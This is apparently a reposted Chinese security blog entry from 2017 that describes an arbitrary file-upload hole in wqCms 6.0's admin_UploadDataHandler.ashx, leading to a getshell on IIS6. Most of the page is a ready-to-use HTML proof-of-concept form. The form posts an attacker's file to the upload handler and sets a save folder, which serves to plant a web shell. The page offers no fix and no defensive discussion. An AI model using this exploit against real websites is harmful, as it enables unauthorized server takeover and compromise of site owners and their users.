2017-02-15发布

漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点

二、hack it

wqCms6.0在IIS6的Getshell
wqCms6.0在IIS6的Getshell

三、POC

<html>
    <body>
        <form action="http://127.0.0.1/admin_UploadDataHandler.ashx" method="POST"enctype="multipart/form-data">
            <input  type="file" name="uploadify" />
            <input  type="text" name="saveFile" value="admin" />
            <input type="submit" name="Upload" value="Submit Query" />
        </form>
    </body>
</html>

转自群友论坛文章wobushou

相关文章:

  • 2021-09-25
  • 2022-01-19
  • 2022-02-22
  • 2021-10-02
  • 2021-11-10
猜你喜欢
  • 2021-08-28
  • 2021-05-29
  • 2021-07-31
  • 2021-04-29
  • 2021-12-02
相关资源
相似解决方案